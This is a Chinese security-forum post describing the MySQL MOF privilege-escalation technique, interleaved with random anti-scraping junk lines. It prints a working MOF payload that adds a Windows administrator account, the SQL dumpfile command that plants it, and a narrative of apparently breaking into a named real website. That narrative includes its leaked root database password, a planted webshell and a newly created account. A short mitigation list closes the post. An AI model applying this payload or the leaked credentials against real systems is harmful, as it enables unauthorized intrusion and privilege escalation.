中国网络渗透测试联盟
标题:
Mysql mof扩展漏洞实例与防范
[打印本页]
作者:
admin
时间:
2013-1-4 19:49
标题:
Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
& v# k0 p' a7 w' Y1 n2 l
; U' W0 P L( I2 W. X$ p2 O; c
网上公开的一些利用代码:
3 k9 [+ X1 V/ ]) {' E3 V! F7 m
- o" ?% n& N8 n, x, ^$ C2 d+ o" `
#pragma namespace(“\\\\.\\root\\subscription”)
8 q9 `2 u- i! F9 k Y2 j0 a5 L/ J
$ t' e* P# v' K# F7 T0 g0 ~/ x& h
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
- n; I6 {# {. L
: F# j1 [5 j5 b6 { d3 i
5 d/ f2 Q" v; k, B4 B& }
8 m% e# ?/ U! C* c
: t/ Y$ t& W9 C* Y( ]
% m a2 W; Q' ~
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
. K2 L& X1 I1 {. h- g- u3 P
从上面代码来看得出解决办法:
# g3 l7 n) n$ n! U; r! d# i
0 p& a8 U0 t, c4 ^8 l& j" N
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
' {7 a0 A1 {, k, L: o. Y( D% Q
, E P2 k) P% f. @' M p8 F
2、禁止使用”WScript.Shel”组件
( ?& g) X. L, ~ h
( M% F, V% |5 K. \5 A/ E4 X9 g# q
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
& p+ i8 f8 O1 y3 ]: ?
+ i- E6 d9 {' |9 K( R
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
' E9 Q, l4 h0 O7 U5 S# M8 a
- N. |) R$ V- N2 C
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
: x$ Z0 Q* E, t( F% L4 P/ B
, A$ P. N, U8 }7 F; d8 A
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
r! P9 o, \2 M% A- g8 N
) ~" {: @/ n" h1 a8 G; _
看懂了后就开始练手吧
8 I l3 y# f' K! \/ {1 {& P
$ {2 M k, M3 l9 B
http://www.webbmw.com/config/config_ucenter.php
一句话 a
2 \% g+ j$ R, @1 d
1 F8 }5 d% D2 q( j
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
1 a3 _ {9 u+ J
: s: G: j& [& E3 h
于是直接用菜刀开搞
9 z" v0 k7 i0 a' c {8 |
( W& K8 C! z/ F- ]. R
上马先
! {: E6 O7 E/ G: [/ p/ [5 q" H2 D' S
* N) k! f( Y" B+ B+ f
既然有了那些账号 之类的 于是我们就执行吧…….
0 g( a& F N3 m& r/ E
) r4 {% |/ B: H% j
小小的说下
' T* w# U' Q: D; w
+ H( F- [ B6 Q" e. ?
在这里第1次执行未成功 原因未知
$ _$ ~8 F0 O! O9 ~8 q" r
; b8 v: ^; j; O, S; q. x5 t
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
+ s# ?4 G) D u' q
9 G1 ]3 C: o+ v# c1 r; O8 w, P
#pragma namespace(“\\\\.\\root\\subscription”)
2 L: z, q7 `$ h; c! O( ?
; n! C3 s1 i/ @
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
7 Z7 ?- g8 x% r; T" _0 y2 I
) J; N7 }1 k9 L$ N7 |% {9 F
我是将文件放到C:\WINDOWS\temp\1.mof
% `' T+ M( y' h/ a
( v( ~" Z: E3 d. @/ E: a% {
所以我们就改下执行的代码
. T+ u5 p5 J! U2 e' U( X0 e' B
0 Y9 b/ c2 F. s; p) S. j
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
" y) }. c- u- k6 w- b, b$ ?, s
$ U3 L! A9 P( ]1 n6 A8 t
5 O. a {, B- x3 u5 k
+ y; v2 k& l- g1 A7 x' q% q& Z. a
但是 你会发现账号还是没有躺在那里。。
) r, d3 L2 E- J" S, t- L2 x: s
+ z5 C; H# C8 a6 x- k1 M7 ^ E. x; w
于是我就感觉蛋疼
+ ] [9 L! L1 P2 A( X2 Q n# B. F
- C: e |* B/ q% Q9 |
就去一个一个去执行 但是执行到第2个 mysql时就成功了………
" V/ B* M* q4 a1 D9 n* I4 y! N
3 k* A2 l) U* `5 U- V6 P7 _. c
3 d6 H0 T) V M0 s3 i. J
z2 i" v4 p! W+ Z* t+ S
但是其他库均不成功…
6 F# A; y$ e: u$ w S& E
) i0 F) ?: z) c& i4 l) N* N
我就很费解呀 到底为什么不成功求大牛解答…
' m) b6 U" H3 ~$ J8 N8 b# ~
" }& s* ]5 ] b$ h& S: v
_, p: B- W- o) b
# Q0 O2 P7 s U
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2